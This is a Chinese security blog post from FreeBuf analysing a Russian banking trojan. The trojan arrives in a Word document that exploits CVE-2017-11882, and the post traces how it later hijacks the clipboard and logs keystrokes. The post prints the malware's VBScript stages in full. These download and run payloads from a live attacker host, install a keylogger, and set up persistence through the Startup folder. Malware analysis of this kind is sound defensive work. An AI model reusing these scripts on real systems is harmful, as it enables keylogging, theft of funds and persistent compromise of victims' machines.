freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

纯静态分析俄罗斯银行木马
2018-11-14 08:00:43

*本文作者:DD黃藥師BB,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

前言

一切开始于拿到俄语《Лабораторная работа 5.doc》文档,上传virustotal检测发现是利用了CVE-2017-11882便开始了接下来的一系列操作。由于分析过程中通过解决问题学到了很多,希望分享出来可能会让其他人也能学到思路和知识。

分析流程

1. 拆解文档

使用rtfobj.py拆分样本文件,查看是否有嵌入对象。

拆解文档果然嵌入了漏洞利用模块,将拆分出的文件使用十六进制查看工具检查对象内容,发现执行命令。

拆解文档

2. 与C2交互

二话不说,直接在虚拟机里访问,发现网页内嵌入脚本如下:

<SCRIPT language=VBScript>

closewordcmd="taskkill /IM winword.exe/F"

Set closeword =CreateObject("WScript.Shell")

closeword = closeword.run (closewordcmd, 0,vbTrue)

 

closemshtacmd="taskkill /IM mshta.exe/F"

Set closemshta =CreateObject("WScript.Shell")

 

Dim fso0, f0

 

Set WshShell = CreateObject("WScript.Shell")

usprof =WshShell.ExpandEnvironmentStrings("%userprofile%")

 

'check if already done

Set fsoqq =CreateObject("Scripting.FileSystemObject")

iffsoqq.FileExists(usprof+"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\Chromeupd.exe") then

closemshta = closemshta.run (closemshtacmd,0, vbTrue)

 

Do While (true)

         ei= 1

loop

end if

 

 

'infecting

Set EXE =CreateObject("WScript.Shell")

EXE = EXE.run ("chrome.exe  http://xnz.freetzi.com/1.rar --incognito--safebrowsing-disable-download-protection", 1, vbFalse)

 

Set fso1 =CreateObject("Scripting.FileSystemObject")

Do While(FSO1.FileExists(usprof+"\downloads\1.rar")=false)

         i= 1

loop

 

closechromecmd="taskkill /IMchrome.exe /F"

 

Set fso =CreateObject("Scripting.FileSystemObject")

Set f2 =fso.GetFile(usprof+"\downloads\1.rar")

f2.Move(usprof+"\appdata\roaming\1.vbs") 'step2 file

 

comman="wscript.exe"+usprof+"\appdata\roaming\1.vbs"

 

Set EXE1 =CreateObject("WScript.Shell")

EXE1 = EXE1.run (comman, 1, vbTrue)

 

 

Set closechrome =CreateObject("WScript.Shell")

closechrome = closechrome.run(closechromecmd, 0, vbTrue)

 

closemshta = closemshta.run (closemshtacmd,0, vbTrue)

 

</SCRIPT>

代码的主要内容是杀死之前环节的进程mshta(执行hta文件的系统进程)、winword(出发漏洞的word进程),并下载1.rar(实际上是一个vbs脚本)执行进行下载和删除操作,下面是下载的1.rar内容。

Set WshShell0 =CreateObject("WScript.Shell")

appdat =WshShell0.ExpandEnvironmentStrings("%appdata%")

 

dloadpath=appdat+"\1.zip"

 

Set oXMLHTTP =CreateObject("MSXML2.XMLHTTP")

oXMLHTTP.Open "GET","http://xnz.freetzi.com/1.zip", 0

oXMLHTTP.Send

Set oADOStream = CreateObject("ADODB.Stream")

oADOStream.Mode = 3 '?????????? ?? ?????? ???????

oADOStream.Type = 1 '??? ?????? - Binary

oADOStream.Open

oADOStream.Write oXMLHTTP.responseBody

oADOStream.SaveToFile dloadpath, 2

 

 

 

Set ShellApp =CreateObject("Shell.Application")

Set objDestFolder =ShellApp.NameSpace(appdat+"\")

Set objSrcFolder =ShellApp.NameSpace(appdat+"\1.zip")

objDestFolder.CopyHere objSrcFolder.Items

 

 

'keylogger

Set kWshShell0 =CreateObject("WScript.Shell")

kappdat =WshShell0.ExpandEnvironmentStrings("%appdata%")

 

kdloadpath=kappdat+"\p.zip"

 

Set koXMLHTTP =CreateObject("MSXML2.XMLHTTP")

koXMLHTTP.Open "GET","http://xnz.freetzi.com/p.zip", 0

koXMLHTTP.Send

Set koADOStream =CreateObject("ADODB.Stream")

koADOStream.Mode = 3

koADOStream.Type = 1

koADOStream.Open

koADOStream.Write koXMLHTTP.responseBody

koADOStream.SaveToFile kdloadpath, 2

 

 

Set kShellApp =CreateObject("Shell.Application")

Set kobjDestFolder =kShellApp.NameSpace(appdat+"\")

Set kobjSrcFolder = kShellApp.NameSpace(appdat+"\p.zip")

kobjDestFolder.CopyHere kobjSrcFolder.Items

'-keylogger

 

 

Dim fso, f

 

Set fso =CreateObject("Scripting.FileSystemObject")

Set f2 =fso.GetFile(appdat+"\1.png")

f2.Move(appdat+"\Microsoft\Windows\Start Menu\Programs\Startup\Chromeupd.exe")

 

 

'delete old

Dim FSOd, Filed

Set FSOd =CreateObject("Scripting.FileSystemObject")

Set Filed =FSOd.GetFile(appdat+"\1.zip")

Filed.Delete

 

Dim FSOd3, Filed3

Set FSOd3 =CreateObject("Scripting.FileSystemObject")

Set Filed3 =FSOd3.GetFile(appdat+"\p.zip")

Filed3.Delete

 

Dim FSOd2, Filed2

Set FSOd2 =CreateObject("Scripting.FileSystemObject")

Set Filed2 =FSOd2.GetFile(appdat+"\1.vbs")

Filed2.Delete

上面的脚本主要功能是执行下载1.zip,该压缩包中是1.png(实际是一个可执行文件),之后更名为Chromeupd.exe并转移到自启动目录下。更改后缀名并查看属性显示如下。

拆解文档

之后下载p.zip,打开后是p.png(实际上是一个自解压文件)。使用搜索引擎查找该文件,确定是俄罗斯的一款更改输入法的应用,暂时不知道有什么用。

拆解文档3. 本地行为分析

下载阶段结束,接下来不与服务器交互。于是开始分析1.png这个可执行文件,检测发现该文件是.NET编写。于是使用dnSpy开始分析,主要功能是几个计时器,定时触发执行。

本地行为分析计时器1的作用是检测剪贴板内容,将符合特征的内容替换掉。

本地行为分析替换内容为以下全局定义的某金融平台账号,暂时可以确定该木马是通过替换剪贴板的账号窃取资金。

本地行为分析计时器3的主要作用是启动上面那个俄罗斯输入法更改软件。

本地行为分析计时器4的主要作用是上传一个日志文件到指定目录,该文件为diary.dat。经过搜索引擎查找,该文件为上面那个俄罗斯软件运行过程中对用户输入的记录保存,所以我们知道了那个俄罗斯软件其实是一个键盘记录器的作用。

本地行为分析

计时器5的主要作用之一是请求C2是否停止攻击,如果服务器显示是‘yes’则停止、杀死进程并删除文件。

本地行为分析根据请求信息显然作者并没要停止的意思。

本地行为分析另一个功能是请求是否更换作者的金融账号,就是设置在木马全局表示变量的字符串。

本地行为分析

根据请求信息显然作者并没有更换新的账号。


本地行为分析

小结

到现在为止我们就清楚的知道了该作者的操作手法,从带有11882漏洞文档触发执行hta文件下载新的vbs脚本到最终安装一个控制剪贴板的自制木马和一个第三方键盘记录器。由于作者使用工具较为简单整个过程中并不需要动态调试,不确定的部分大家可以使用调试器检查。学习过程中的一点积累,大佬勿喷!

*本文作者:DD黃藥師BB,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。

# 俄罗斯 # 银行木马
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者